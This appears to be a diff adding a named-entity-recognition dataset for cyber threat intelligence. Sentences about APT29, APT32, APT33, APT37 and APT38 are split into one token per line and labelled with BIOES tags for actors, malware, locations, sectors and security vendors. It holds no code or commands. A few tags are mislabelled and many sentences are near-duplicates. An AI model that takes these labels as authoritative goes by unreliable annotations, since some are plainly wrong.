+backdoor O
+for O
+use O
+if O
+they O
+lost O
+access O
+to O
+their O
+primary O
+backdoors O
+. O
+
+POSHSPY S-MAL
+is O
+an O
+excellent O
+example O
+of O
+the O
+skill O
+and O
+craftiness O
+of O
+APT29 S-APT
+. O
+
+FireEye S-SECTEAM
+assesses O
+that O
+APT32 S-APT
+leverages O
+a O
+unique O
+suite O
+of O
+fully-featured O
+malware O
+, O
+in O
+conjunction O
+with O
+commercially-available O
+tools O
+, O
+to O
+conduct O
+targeted O
+operations O
+that O
+are O
+aligned O
+with O
+Vietnamese S-LOC
+state O
+interests O
+. O
+
+In O
+addition O
+to O
+focused O
+targeting O
+of O
+the O
+private O
+sector O
+with O
+ties O
+to O
+Vietnam S-LOC
+, O
+APT32 S-APT
+has O
+also O
+targeted O
+foreign O
+governments S-IDTY
+, O
+as O
+well O
+as O
+Vietnamese S-LOC
+dissidents S-IDTY
+and O
+journalists S-IDTY
+since O
+at O
+least O
+2013 S-TIME
+. O
+
+From O
+2016 S-TIME
+through O
+2017 S-TIME
+, O
+two O
+subsidiaries O
+of O
+U.S. S-LOC
+and O
+Philippine O
+consumer B-IDTY
+products I-IDTY
+corporations E-IDTY
+, O
+located O
+inside O
+Vietnam S-LOC
+, O
+were O
+the O
+target O
+of O
+APT32 S-APT
+intrusion O
+operations O
+. O
+
+From O
+2016 S-TIME
+through O
+2017 S-TIME
+, O
+two O
+consumer B-IDTY
+products I-IDTY
+corporations E-IDTY
+, O
+located O
+inside O
+Vietnam S-LOC
+, O
+were O
+the O
+target O
+of O
+APT32 S-APT
+intrusion O
+operations O
+. O
+
+In O
+2014 S-TIME
+, O
+APT32 S-APT
+leveraged O
+a O
+spear-phishing S-ACT
+attachment E-ACT
+titled O
+" O
+Plans O
+to O
+crackdown O
+on O
+protesters O
+at O
+the O
+Embassy O
+of O
+Vietnam.exe S-FILE
+, O
+" O
+which O
+targeted O
+dissident O
+activity O
+among O
+the O
+Vietnamese S-LOC
+diaspora S-IDTY
+in O
+Southeast B-LOC
+Asia E-LOC
+. O
+
+In O
+2015 S-TIME
+and O
+2016 S-TIME
+, O
+two O
+Vietnamese S-LOC
+media S-IDTY
+outlets O
+were O
+targeted O
+with O
+malware O
+that O
+FireEye S-SECTEAM
+assesses O
+to O
+be O
+unique O
+to O
+APT32 S-APT
+. O
+
+In O
+2014 S-TIME
+, O
+APT32 S-APT
+leveraged O
+a O
+spear-phishing S-ACT
+attachment E-ACT
+titled O
+" O
+Plans O
+to O
+crackdown O
+on O
+protesters O
+at O
+the O
+Embassy O
+of O
+Vietnam.exe S-FILE
+" O
+. O
+
+Since O
+at O
+least O
+2014 S-TIME
+, O
+FireEye S-SECTEAM
+has O
+observed O
+APT32 S-APT
+targeting O
+foreign B-IDTY
+corporations E-IDTY
+with O
+a O
+vested O
+interest O
+in O
+Vietnam S-LOC
+'s O
+manufacturing S-IDTY
+, O
+consumer B-IDTY
+products E-IDTY
+, O
+and O
+hospitality B-IDTY
+sectors E-IDTY
+. O
+
+APT32 S-APT
+operations O
+are O
+characterized O
+through O
+deployment O
+of O
+signature O
+malware O
+payloads O
+including O
+WINDSHIELD S-MAL
+, O
+KOMPROGO S-MAL
+, O
+SOUNDBITE S-MAL
+, O
+and O
+PHOREAL S-MAL
+. O
+
+In O
+2017 S-TIME
+, O
+social B-IDTY
+engineering E-IDTY
+content O
+in O
+lures O
+used O
+by O
+the O
+actor S-APT
+provided O
+evidence O
+that O
+they O
+were O
+likely O
+used O
+to O
+target O
+members O
+of O
+the O
+Vietnam S-LOC
+diaspora S-IDTY
+in O
+Australia S-LOC
+as O
+well O
+as O
+government B-IDTY
+employees E-IDTY
+in O
+the O
+Philippines S-LOC
+. O
+
+APT32 S-APT
+often O
+deploys O
+these O
+backdoors O
+along O
+with O
+the O
+commercially-available O
+Cobalt B-MAL
+Strike I-MAL
+BEACON I-MAL
+backdoor E-MAL
+. O
+
+APT32 S-APT
+often O
+deploys O
+these O
+backdoors O
+along O
+with O
+the O
+commercially-available O
+Cobalt B-MAL
+Strike I-MAL
+backdoor E-MAL
+. O
+
+Based O
+on O
+incident O
+response O
+investigations O
+, O
+product O
+detections O
+, O
+and O
+intelligence O
+observations O
+along O
+with O
+additional O
+publications O
+on O
+the O
+same O
+operators S-APT
+, O
+FireEye S-SECTEAM
+assesses O
+that O
+APT32 S-APT
+is O
+a O
+cyber B-ACT
+espionage I-ACT
+group O
+aligned O
+with O
+Vietnamese S-LOC
+government O
+interests O
+. O
+
+OceanLotus S-APT
+, O
+also O
+known O
+as O
+APT32 S-APT
+, O
+is O
+believed O
+to O
+be O
+a O
+Vietnam-based S-LOC
+APT O
+group O
+that O
+has O
+become O
+increasingly O
+sophisticated O
+in O
+its O
+attack O
+tactics O
+, O
+techniques O
+, O
+and O
+procedures O
+( O
+TTPs O
+) O
+. O
+
+While O
+Volexity S-SECTEAM
+does O
+not O
+typically O
+engage O
+in O
+attempting O
+attribution O
+of O
+any O
+threat O
+actor O
+, O
+Volexity S-SECTEAM
+does O
+agree O
+with O
+previously O
+reported O
+assessments O
+that O
+OceanLotus S-APT
+is O
+likely O
+operating O
+out O
+of O
+Vietnam S-LOC
+. O
+
+During O
+that O
+phase O
+, O
+the O
+APT32 S-APT
+operated O
+a O
+fileless O
+PowerShell-based O
+infrastructure O
+, O
+using O
+customized B-MAL
+PowerShell E-MAL
+payloads O
+taken O
+from O
+known O
+offensive O
+frameworks O
+such O
+as O
+Cobalt B-MAL
+Strike E-MAL
+, O
+PowerSploit S-MAL
+and O
+Nishang S-MAL
+. O
+
+However O
+, O
+over O
+the O
+past O
+few O
+years O
+, O
+we O
+have O
+been O
+tracking O
+a O
+separate O
+, O
+less O
+widely O
+known O
+suspected O
+Iranian S-LOC
+group O
+with O
+potential O
+destructive O
+capabilities O
+, O
+whom O
+we O
+call O
+APT33 S-APT
+. O
+
+Our O
+analysis O
+reveals O
+that O
+APT33 S-APT
+is O
+a O
+capable O
+group O
+that O
+has O
+carried O
+out O
+cyber B-ACT
+espionage I-ACT
+operations E-ACT
+since O
+at O
+least O
+2013 S-TIME
+. O
+
+We O
+assess O
+APT33 S-APT
+works O
+at O
+the O
+behest O
+of O
+the O
+Iranian S-LOC
+government O
+. O
+
+APT33 S-APT
+has O
+targeted O
+organizations O
+– O
+spanning B-IDTY
+multiple I-IDTY
+industries E-IDTY
+– O
+headquartered O
+in O
+the O
+United B-LOC
+States E-LOC
+, O
+Saudi B-LOC
+Arabia E-LOC
+and O
+South B-LOC
+Korea E-LOC
+. O
+
+Cybereason S-SECTEAM
+also O
+attributes O
+the O
+recently O
+reported O
+Backdoor.Win32.Denis S-MAL
+to O
+the O
+OceanLotus B-APT
+Group E-APT
+, O
+which O
+at O
+the O
+time O
+of O
+this O
+report O
+'s O
+writing O
+, O
+had O
+not O
+been O
+officially O
+linked O
+to O
+this O
+threat O
+actor O
+. O
+
+APT33 S-APT
+has O
+shown O
+particular O
+interest O
+in O
+organizations O
+in O
+the O
+aviation B-IDTY
+sector E-IDTY
+, O
+as O
+well O
+as O
+organizations O
+in O
+the O
+energy B-IDTY
+sector E-IDTY
+with O
+ties O
+to O
+petrochemical S-IDTY
+production O
+. O
+
+From O
+mid-2016 S-TIME
+through O
+early B-TIME
+2017 E-TIME
+, O
+APT33 S-APT
+compromised O
+a O
+U.S. S-LOC
+organization S-IDTY
+in O
+the O
+aerospace B-IDTY
+sector E-IDTY
+and O
+targeted O
+a O
+business B-IDTY
+conglomerate E-IDTY
+located O
+in O
+Saudi B-LOC
+Arabia E-LOC
+with O
+aviation O
+holdings O
+. O
+
+From O
+mid-2016 S-TIME
+through O
+early B-TIME
+2017 E-TIME
+, O
+APT33 S-APT
+compromised O
+organizations O
+located O
+in O
+Saudi B-LOC
+Arabia E-LOC
+and O
+U.S. S-LOC
+in O
+the O
+aerospace B-IDTY
+sector E-IDTY
+. O
+
+During O
+the O
+same O
+time O
+period O
+, O
+APT33 S-APT
+also O
+targeted O
+companies O
+in O
+South B-LOC
+Korea E-LOC
+involved O
+in O
+oil B-IDTY
+refining E-IDTY
+and O
+petrochemicals S-IDTY
+. O
+
+More O
+recently O
+, O
+in O
+May B-TIME
+2017 E-TIME
+, O
+APT33 S-APT
+appeared O
+to O
+target O
+a O
+Saudi S-LOC
+organization S-IDTY
+and O
+a O
+South B-LOC
+Korean E-LOC
+business B-IDTY
+conglomerate E-IDTY
+using O
+a O
+malicious B-FILE
+file E-FILE
+that O
+attempted O
+to O
+entice O
+victims O
+with O
+job O
+vacancies O
+for O
+a O
+Saudi B-LOC
+Arabian E-LOC
+petrochemical B-IDTY
+company E-IDTY
+. O
+
+More O
+recently O
+, O
+in O
+May B-TIME
+2017 E-TIME
+, O
+APT33 S-APT
+appeared O
+to O
+target O
+organizations O
+in O
+Saudi S-LOC
+and O
+South B-LOC
+Korea E-LOC
+using O
+a O
+malicious B-FILE
+file E-FILE
+that O
+attempted O
+to O
+entice O
+victims O
+with O
+job O
+vacancies O
+. O
+
+We O
+assess O
+the O
+targeting O
+of O
+multiple O
+companies O
+with O
+aviation-related O
+partnerships O
+to O
+Saudi B-LOC
+Arabia E-LOC
+indicates O
+that O
+APT33 S-APT
+may O
+possibly O
+be O
+looking O
+to O
+gain O
+insights O
+on O
+Saudi B-LOC
+Arabia E-LOC
+'s O
+military O
+aviation O
+capabilities O
+to O
+enhance O
+Iran S-LOC
+'s O
+domestic O
+aviation O
+capabilities O
+or O
+to O
+support O
+Iran S-LOC
+'s O
+military S-IDTY
+and O
+strategic O
+decision O
+making O
+vis O
+a O
+vis O
+Saudi B-LOC
+Arabia E-LOC
+. O
+
+APT33 S-APT
+may O
+possibly O
+be O
+looking O
+to O
+gain O
+insights O
+on O
+Saudi B-LOC
+Arabia E-LOC
+'s O
+military O
+aviation O
+capabilities O
+to O
+enhance O
+Iran S-LOC
+'s O
+domestic O
+aviation O
+capabilities O
+or O
+to O
+support O
+Iran S-LOC
+'s O
+military S-IDTY
+and O
+strategic O
+decision O
+making O
+vis O
+a O
+vis O
+Saudi B-LOC
+Arabia E-LOC
+. O
+
+The O
+generalized O
+targeting O
+of O
+organizations O
+involved O
+in O
+energy S-IDTY
+and O
+petrochemicals S-IDTY
+mirrors O
+previously O
+observed O
+targeting O
+by O
+other O
+suspected O
+Iranian S-LOC
+threat B-APT
+groups E-APT
+, O
+indicating O
+a O
+common O
+interest O
+in O
+the O
+sectors O
+across O
+Iranian S-LOC
+actors S-APT
+. O
+
+APT33 S-APT
+sent O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+to O
+employees S-IDTY
+whose O
+jobs O
+related O
+to O
+the O
+aviation B-IDTY
+industry E-IDTY
+. O
+
+APT33 S-APT
+registered O
+multiple O
+domains O
+that O
+masquerade O
+as O
+Saudi B-LOC
+Arabian E-LOC
+aviation B-IDTY
+companies E-IDTY
+and O
+Western S-LOC
+organizations O
+that O
+together O
+have O
+partnerships O
+to O
+provide O
+training O
+, O
+maintenance O
+and O
+support O
+for O
+Saudi S-LOC
+'s O
+military O
+and O
+commercial O
+fleet O
+. O
+
+We O
+identified O
+APT33 S-MAL
+malware S-MAL
+tied O
+to O
+an O
+Iranian S-LOC
+persona O
+who O
+may O
+have O
+been O
+employed O
+by O
+the O
+Iranian S-LOC
+government O
+to O
+conduct O
+cyber B-ACT
+threat I-ACT
+activity E-ACT
+against O
+its O
+adversaries O
+. O
+
+APT33 S-APT
+'s O
+targeting O
+of O
+organizations O
+involved O
+in O
+aerospace S-IDTY
+and O
+energy S-IDTY
+most O
+closely O
+aligns O
+with O
+nation-state O
+interests O
+, O
+implying O
+that O
+the O
+threat O
+actor O
+is O
+most O
+likely O
+government O
+sponsored O
+. O
+
+APT33 S-APT
+leverages O
+popular O
+Iranian S-LOC
+hacker O
+tools O
+and O
+DNS S-PROT
+servers O
+used O
+by O
+other O
+suspected O
+Iranian S-LOC
+threat B-APT
+groups E-APT
+. O
+
+This O
+coupled O
+with O
+the O
+timing O
+of O
+operations O
+– O
+which O
+coincides O
+with O
+Iranian S-LOC
+working O
+hours O
+– O
+and O
+the O
+use O
+of O
+multiple O
+Iranian S-LOC
+hacker O
+tools O
+and O
+name B-MAL
+servers E-MAL
+bolsters O
+our O
+assessment O
+that O
+APT33 S-APT
+may O
+have O
+operated O
+on O
+behalf O
+of O
+the O
+Iranian S-LOC
+government O
+. O
+
+The O
+publicly O
+available O
+backdoors O
+and O
+tools O
+utilized O
+by O
+APT33 S-APT
+– O
+including O
+NANOCORE S-MAL
+, O
+NETWIRE S-MAL
+, O
+and O
+ALFA B-MAL
+Shell E-MAL
+– O
+are O
+all O
+available O
+on O
+Iranian S-LOC
+hacking O
+websites O
+, O
+associated O
+with O
+Iranian S-LOC
+hackers O
+, O
+and O
+used O
+by O
+other O
+suspected O
+Iranian S-LOC
+threat B-APT
+groups E-APT
+. O
+
+APT33 S-APT
+'s O
+focus O
+on O
+aviation S-IDTY
+may O
+indicate O
+the O
+group O
+'s O
+desire O
+to O
+gain O
+insight O
+into O
+regional O
+military S-IDTY
+capabilities O
+to O
+enhance O
+Iran S-LOC
+'s O
+aviation O
+capabilities O
+or O
+to O
+support O
+Iran S-LOC
+'s O
+military S-IDTY
+and O
+strategic O
+decision O
+making O
+. O
+
+Specifically O
+, O
+the O
+targeting O
+of O
+organizations O
+in O
+the O
+aerospace S-IDTY
+and O
+energy B-IDTY
+sectors E-IDTY
+indicates O
+that O
+the O
+APT33 S-APT
+is O
+likely O
+in O
+search O
+of O
+strategic O
+intelligence O
+capable O
+of O
+benefitting O
+a O
+government S-IDTY
+or O
+military S-IDTY
+sponsor O
+. O
+
+APT33 S-APT
+'s O
+focus O
+on O
+aviation S-IDTY
+may O
+indicate O
+the O
+group O
+'s O
+desire O
+to O
+gain O
+insight O
+into O
+regional O
+military O
+aviation O
+capabilities O
+to O
+enhance O
+Iran S-LOC
+'s O
+aviation S-IDTY
+capabilities O
+or O
+to O
+support O
+Iran S-LOC
+'s O
+military S-IDTY
+and O
+strategic O
+decision O
+making O
+. O
+
+We O
+expect O
+APT33 B-ACT
+activity E-ACT
+will O
+continue O
+to O
+cover O
+a O
+broad O
+scope O
+of O
+targeted O
+entities O
+, O
+and O
+may O
+spread O
+into O
+other O
+regions O
+and O
+sectors O
+as O
+Iranian S-LOC
+interests O
+dictate O
+. O
+
+The O
+Elfin S-APT
+espionage S-ACT
+group O
+( O
+aka O
+APT33 S-APT
+) O
+has O
+remained O
+highly O
+active O
+over O
+the O
+past O
+three O
+years O
+, O
+attacking O
+at O
+least O
+50 O
+organizations O
+in O
+Saudi B-LOC
+Arabia E-LOC
+, O
+the O
+United B-LOC
+States E-LOC
+, O
+and O
+a O
+range O
+of O
+other O
+countries O
+. O
+
+On O
+May B-TIME
+16 I-TIME
+, I-TIME
+2019 E-TIME
+FireEye B-SECTEAM
+'s I-SECTEAM
+Advanced I-SECTEAM
+Practices E-SECTEAM
+team O
+attributed O
+the O
+remaining O
+" O
+suspected O
+APT33 B-ACT
+activity E-ACT
+" O
+( O
+referred O
+to O
+as O
+GroupB O
+in O
+this O
+blog O
+post O
+) O
+to O
+APT33 S-APT
+, O
+operating O
+at O
+the O
+behest O
+of O
+the O
+Iranian S-LOC
+government O
+. O
+
+The O
+Elfin B-APT
+group E-APT
+( O
+aka O
+APT33 S-APT
+) O
+has O
+remained O
+highly O
+active O
+over O
+the O
+past O
+three O
+years O
+, O
+attacking O
+at O
+least O
+50 O
+organizations O
+in O
+Saudi B-LOC
+Arabia E-LOC
+, O
+the O
+United B-LOC
+States E-LOC
+, O
+and O
+a O
+range O
+of O
+other O
+countries O
+. O
+
+On O
+May B-TIME
+16 I-TIME
+, I-TIME
+2019 E-TIME
+FireEye B-SECTEAM
+'s I-SECTEAM
+Advanced I-SECTEAM
+Practices E-SECTEAM
+team O
+attributed O
+the O
+remaining O
+" O
+suspected O
+APT33 B-ACT
+activity E-ACT
+" O
+to O
+APT33 S-APT
+, O
+operating O
+at O
+the O
+behest O
+of O
+the O
+Iranian S-LOC
+government O
+. O
+
+APT37 S-APT
+has O
+likely O
+been O
+active O
+since O
+at O
+least O
+2012 S-TIME
+and O
+focuses O
+on O
+targeting O
+the O
+public O
+and O
+private O
+sectors O
+primarily O
+in O
+South B-LOC
+Korea E-LOC
+. O
+
+In O
+2017 S-TIME
+, O
+APT37 S-APT
+expanded O
+its O
+targeting O
+beyond O
+the O
+Korean B-LOC
+peninsula E-LOC
+to O
+include O
+Japan S-LOC
+, O
+Vietnam S-LOC
+and O
+the O
+Middle B-LOC
+East E-LOC
+, O
+and O
+to O
+a O
+wider O
+range O
+of O
+industry O
+verticals O
+, O
+including O
+chemicals S-IDTY
+, O
+electronics S-IDTY
+, O
+manufacturing S-IDTY
+, O
+aerospace S-IDTY
+, O
+automotive S-IDTY
+and O
+healthcare B-IDTY
+entities E-IDTY
+. O
+
+In O
+2017 S-TIME
+, O
+APT37 S-APT
+targeted O
+a O
+company O
+in O
+Middle B-LOC
+East E-LOC
+that O
+entered O
+into O
+a O
+joint O
+venture O
+with O
+the O
+North B-LOC
+Korean E-LOC
+government O
+to O
+provide O
+telecommunications B-IDTY
+service E-IDTY
+to O
+the O
+country O
+. O
+
+While O
+not O
+conclusive O
+by O
+itself O
+, O
+the O
+use O
+of O
+publicly O
+available O
+Iranian S-LOC
+hacking O
+tools O
+and O
+popular O
+Iranian S-LOC
+hosting B-IDTY
+companies E-IDTY
+may O
+be O
+a O
+result O
+of O
+APT33 S-APT
+'s O
+familiarity O
+with O
+them O
+and O
+lends O
+support O
+to O
+the O
+assessment O
+that O
+APT33 S-APT
+may O
+be O
+based O
+in O
+Iran S-LOC
+. O
+
+North B-LOC
+Korean E-LOC
+defector O
+and O
+human O
+rights-related O
+targeting O
+provides O
+further O
+evidence O
+that O
+APT37 S-APT
+conducts O
+operations O
+aligned O
+with O
+the O
+interests O
+of O
+North B-LOC
+Korea E-LOC
+. O
+
+In O
+2017 S-TIME
+, O
+APT37 S-APT
+targeted O
+a O
+Middle B-LOC
+Eastern E-LOC
+company S-IDTY
+that O
+entered O
+into O
+a O
+joint O
+venture O
+with O
+the O
+North B-LOC
+Korean E-LOC
+government O
+to O
+provide O
+telecommunications B-IDTY
+service E-IDTY
+to O
+the O
+country O
+( O
+read O
+on O
+for O
+a O
+case O
+study O
+) O
+. O
+
+APT37 S-APT
+targeted O
+a O
+research B-IDTY
+fellow E-IDTY
+, O
+advisory B-IDTY
+member E-IDTY
+, O
+and O
+journalist S-IDTY
+associated O
+with O
+different O
+North B-LOC
+Korean E-LOC
+human O
+rights O
+issues O
+and O
+strategic B-IDTY
+organizations E-IDTY
+. O
+
+APT37 S-APT
+distributed O
+SLOWDRIFT S-MAL
+malware S-MAL
+using O
+a O
+lure O
+referencing O
+the O
+Korea O
+Global O
+Forum O
+against O
+academic S-IDTY
+and O
+strategic B-IDTY
+institutions E-IDTY
+located O
+in O
+South B-LOC
+Korea E-LOC
+. O
+
+We O
+believe O
+a O
+organization O
+located O
+in O
+Middle B-LOC
+East E-LOC
+was O
+targeted O
+by O
+APT37 S-APT
+because O
+it O
+had O
+been O
+involved O
+with O
+a O
+North B-LOC
+Korean E-LOC
+company S-IDTY
+and O
+a O
+business O
+deal O
+went O
+bad O
+. O
+
+In O
+one O
+instance O
+, O
+APT37 S-APT
+weaponized O
+a O
+video O
+downloader O
+application O
+with O
+KARAE S-MAL
+malware S-MAL
+that O
+was O
+indiscriminately O
+distributed O
+to O
+South B-LOC
+Korean E-LOC
+victims O
+through O
+torrent O
+websites O
+. O
+
+FireEye S-SECTEAM
+confirmed O
+that O
+since O
+at O
+least O
+November B-TIME
+2017 E-TIME
+, O
+APT37 S-APT
+exploited O
+a O
+zero-day S-VULNAME
+Adobe B-TOOL
+Flash E-TOOL
+vulnerability O
+, O
+CVE-2018-4878 S-VULID
+, O
+to O
+distribute O
+DOGCALL S-MAL
+malware S-MAL
+to O
+South B-LOC
+Korean E-LOC
+victims O
+. O
+
+FireEye B-SECTEAM
+iSIGHT I-SECTEAM
+Intelligence E-SECTEAM
+confirmed O
+that O
+since O
+at O
+least O
+November B-TIME
+2017 E-TIME
+, O
+APT37 S-APT
+exploited O
+a O
+zero-day S-VULNAME
+Adobe B-TOOL
+Flash E-TOOL
+vulnerability O
+, O
+CVE-2018-4878 S-VULID
+, O
+to O
+distribute O
+DOGCALL S-MAL
+malware S-MAL
+to O
+South B-LOC
+Korean E-LOC
+victims O
+. O
+
+In O
+April B-TIME
+2017 E-TIME
+, O
+APT37 S-APT
+targeted O
+South B-LOC
+Korean E-LOC
+military S-IDTY
+and O
+government B-IDTY
+organizations E-IDTY
+with O
+the O
+DOGCALL B-MAL
+backdoor E-MAL
+and O
+RUHAPPY B-MAL
+wiper I-MAL
+malware E-MAL
+. O
+
+It O
+is O
+possible O
+that O
+APT37 S-APT
+'s O
+distribution O
+of O
+KARAE S-MAL
+malware S-MAL
+via O
+torrent O
+websites O
+could O
+assist O
+in O
+creating O
+and O
+maintaining O
+botnets O
+for O
+future O
+distributed B-ACT
+denial-of-service E-ACT
+( O
+DDoS S-ACT
+) O
+attacks O
+, O
+or O
+for O
+other O
+activity O
+such O
+as O
+financially O
+motivated O
+campaigns S-ACT
+or O
+disruptive O
+operations O
+. O
+
+We O
+assess O
+with O
+high O
+confidence O
+that O
+APT37 S-APT
+acts O
+in O
+support O
+of O
+the O
+North B-LOC
+Korean E-LOC
+government O
+and O
+is O
+primarily O
+based O
+in O
+North B-LOC
+Korea E-LOC
+. O
+
+The O
+compilation O
+times O
+of O
+APT37 S-MAL
+malware S-MAL
+is O
+consistent O
+with O
+a O
+developer O
+operating O
+in O
+the O
+North B-LOC
+Korea E-LOC
+time O
+zone O
+( O
+UTC O
++8:30 O
+) O
+and O
+follows O
+what O
+is O
+believed O
+to O
+be O
+a O
+typical O
+North B-LOC
+Korean E-LOC
+workday O
+. O
+
+The O
+majority O
+of O
+APT37 B-ACT
+activity E-ACT
+continues O
+to O
+target O
+South B-LOC
+Korea E-LOC
+, O
+North B-LOC
+Korean E-LOC
+defectors S-IDTY
+, O
+and O
+organizations O
+and O
+individuals O
+involved O
+in O
+Korean B-LOC
+Peninsula E-LOC
+reunification O
+efforts O
+. O
+
+Similarly O
+, O
+APT37 S-APT
+targeting O
+of O
+a O
+company O
+located O
+in O
+Middle B-LOC
+East E-LOC
+in O
+2017 S-TIME
+is O
+also O
+consistent O
+with O
+North B-LOC
+Korean E-LOC
+objectives O
+given O
+the O
+entity O
+'s O
+extensive O
+relationships O
+inside O
+North B-LOC
+Korea E-LOC
+. O
+
+Similarly O
+, O
+APT37 S-APT
+targeting O
+of O
+a O
+Middle B-LOC
+Eastern E-LOC
+company S-IDTY
+in O
+2017 S-TIME
+is O
+also O
+consistent O
+with O
+North B-LOC
+Korean E-LOC
+objectives O
+given O
+the O
+entity O
+'s O
+extensive O
+relationships O
+inside O
+North B-LOC
+Korea E-LOC
+. O
+
+In O
+May B-TIME
+2017 E-TIME
+, O
+APT37 S-APT
+used O
+a O
+bank O
+liquidation O
+letter O
+as O
+a O
+spear B-ACT
+phishing I-ACT
+lure E-ACT
+against O
+a O
+board B-IDTY
+member E-IDTY
+of O
+a O
+Middle B-LOC
+Eastern E-LOC
+financial B-IDTY
+company E-IDTY
+. O
+
+Though O
+they O
+have O
+primarily O
+tapped O
+other O
+tracked O
+suspected O
+North B-LOC
+Korean E-LOC
+teams O
+to O
+carry O
+out O
+the O
+most O
+aggressive O
+actions O
+, O
+APT37 S-APT
+is O
+an O
+additional O
+tool O
+available O
+to O
+the O
+regime O
+, O
+perhaps O
+even O
+desirable O
+for O
+its O
+relative O
+obscurity O
+. O
+
+ScarCruft S-APT
+is O
+a O
+relatively O
+new O
+APT O
+group O
+, O
+victims O
+have O
+been O
+observed O
+in O
+Russia S-LOC
+, O
+Nepal S-LOC
+, O
+South B-LOC
+Korea E-LOC
+, O
+China S-LOC
+, O
+India S-LOC
+, O
+Kuwait S-LOC
+and O
+Romania S-LOC
+. O
+
+Certain O
+details O
+, O
+such O
+as O
+using O
+the O
+same O
+infrastructure O
+and O
+targeting O
+, O
+make O
+us O
+believe O
+that O
+Operation B-ACT
+Daybreak E-ACT
+is O
+being O
+done O
+by O
+the O
+ScarCruft S-APT
+APT O
+group O
+. O
+
+Prior O
+to O
+the O
+discovery O
+of O
+Operation B-ACT
+Daybreak E-ACT
+, O
+we O
+observed O
+the O
+ScarCruft B-APT
+APT E-APT
+launching O
+a O
+series O
+of O
+attacks O
+in O
+Operation B-ACT
+Erebus E-ACT
+. O
+
+Operation B-ACT
+Daybreak E-ACT
+appears O
+to O
+have O
+been O
+launched O
+by O
+unknown O
+attackers S-APT
+to O
+infect O
+high O
+profile O
+targets O
+through O
+spear-phishing S-ACT
+e-mails E-ACT
+. O
+
+Operation B-ACT
+Daybreak E-ACT
+appears O
+to O
+have O
+been O
+launched O
+by O
+APT37 S-APT
+to O
+infect O
+high O
+profile O
+targets O
+through O
+spear-phishing S-ACT
+e-mails E-ACT
+. O
+
+On O
+occasion O
+the O
+APT37 S-APT
+directly O
+included O
+the O
+ROKRAT S-MAL
+payload O
+in O
+the O
+malicious O
+document O
+and O
+during O
+other O
+campaigns S-ACT
+the O
+attackers S-APT
+leveraged O
+multi-stage O
+infection O
+processes O
+. O
+
+In O
+the O
+early B-TIME
+part I-TIME
+of I-TIME
+2017 E-TIME
+, O
+Group123 S-APT
+started O
+the O
+" O
+Evil B-ACT
+New I-ACT
+Year E-ACT
+" O
+campaign O
+. O
+
+In O
+November B-TIME
+2017 E-TIME
+, O
+Talos S-SECTEAM
+observed O
+the O
+latest O
+Group123 B-ACT
+campaign E-ACT
+of O
+the O
+year O
+, O
+which O
+included O
+a O
+new O
+version O
+of O
+ROKRAT S-MAL
+being O
+used O
+in O
+the O
+latest O
+wave O
+of O
+attacks O
+. O
+
+Group123 S-APT
+is O
+constantly O
+evolving O
+as O
+the O
+new O
+fileless O
+capability O
+that O
+was O
+added O
+to O
+ROKRAT S-MAL
+demonstrates O
+. O
+
+In O
+this O
+campaign O
+, O
+the O
+Group123 S-APT
+used O
+a O
+classical O
+HWP B-MAL
+document E-MAL
+in O
+order O
+to O
+download O
+and O
+execute O
+a O
+previously O
+unknown O
+malware O
+: O
+NavRAT S-MAL
+. O
+
+However O
+, O
+we O
+asses O
+with O
+medium O
+confidence O
+that O
+NavRAT S-MAL
+is O
+linked O
+to O
+Group123 S-APT
+. O
+
+APT38 S-APT
+is O
+a O
+financially O
+motivated O
+North B-LOC
+Korean E-LOC
+regime-backed O
+group O
+responsible O
+for O
+conducting O
+destructive B-ACT
+attacks E-ACT
+against O
+financial B-IDTY
+institutions E-IDTY
+, O
+as O
+well O
+as O
+some O
+of O
+the O
+world O
+'s O
+largest O
+cyber B-APT
+heists E-APT
+. O
+
+APT38 S-APT
+is O
+a O
+financially O
+motivated O
+North B-LOC
+Korean E-LOC
+regime-backed O
+group O
+responsible O
+for O
+conducting O
+destructive B-ACT
+attacks E-ACT
+against O
+financial B-IDTY
+institutions E-IDTY
+, O
+as O
+well O
+as O
+some O
+of O
+the O
+world O
+. O
+
+APT38 S-APT
+is O
+believed O
+to O
+operate O
+more O
+similarly O
+to O
+an O
+espionage O
+operation O
+, O
+carefully O
+conducting O
+reconnaissance O
+within O
+compromised O
+financial B-IDTY
+institutions E-IDTY
+and O
+balancing O
+financially O
+motivated O
+objectives O
+with O
+learning O
+about O
+internal O
+systems O
+. O
+
+The O
+group O
+has O
+compromised O
+more O
+than O
+16 O
+organizations O
+in O
+at O
+least O
+13 O
+different O
+countries O
+, O
+sometimes O
+simultaneously O
+, O
+since O
+at O
+least O
+2014 S-TIME
+. O
+
+APT38 S-APT
+shares O
+malware O
+code O
+and O
+other O
+development O
+resources O
+with O
+TEMP.Hermit S-APT
+North B-LOC
+Korean E-LOC
+cyber B-ACT
+espionage I-ACT
+activity E-ACT
+, O
+although O
+we O
+consider O
+APT38 S-APT
+. O
+
+We O
+consider O
+APT38 S-APT
+'s O
+operations O
+more O
+global O
+and O
+highly O
+specialized O
+for O
+targeting O
+the O
+financial B-IDTY
+sector E-IDTY
+. O
+
+APT38 S-APT
+is O
+a O
+financially O
+motivated O
+group O
+linked O
+to O
+North B-LOC
+Korean E-LOC
+cyber B-APT
+espionage I-APT
+operators E-APT
+, O
+renown O
+for O
+attempting O
+to O
+steal O
+hundreds O
+of O
+millions O
+of O
+dollars O
+from O
+financial B-IDTY
+institutions E-IDTY
+and O
+their O
+brazen O
+use O
+of O
+destructive O
+malware O
+. O
+
+Because O
+APT38 S-APT
+is O
+backed O
+by O
+( O
+and O
+acts O
+on O
+behalf O
+of O
+) O
+the O
+North B-LOC
+Korean E-LOC
+regime O
+, O
+we O
+opted O
+to O
+categorize O
+the O
+group O
+as O
+an O
+" O
+APT O
+" O
+instead O
+of O
+a O
+" O
+FIN O
+" O
+. O
+
+Over O
+time O
+these O
+malware O
+similarities O
+diverged O
+, O
+as O
+did O
+targeting O
+, O
+intended O
+outcomes O
+, O
+and O
+TTPs O
+, O
+almost O
+certainly O
+indicating O
+that O
+TEMP.Hermit B-ACT
+activity E-ACT
+is O
+made O
+up O
+of O
+multiple O
+operational B-APT
+groups E-APT
+primarily O
+linked O
+together O
+with O
+shared O
+malware O
+development O
+resources O
+and O
+North B-LOC
+Korean E-LOC
+state O
+sponsorship O
+. O
+
+Based O
+on O
+observed O
+activity O
+, O
+we O
+judge O
+that O
+APT38 S-APT
+'s O
+primary O
+mission O
+is O
+targeting O
+financial B-IDTY
+institutions E-IDTY
+and O
+manipulating O
+inter-bank O
+financial O
+systems O
+to O
+raise O
+large O
+sums O
+of O
+money O
+for O
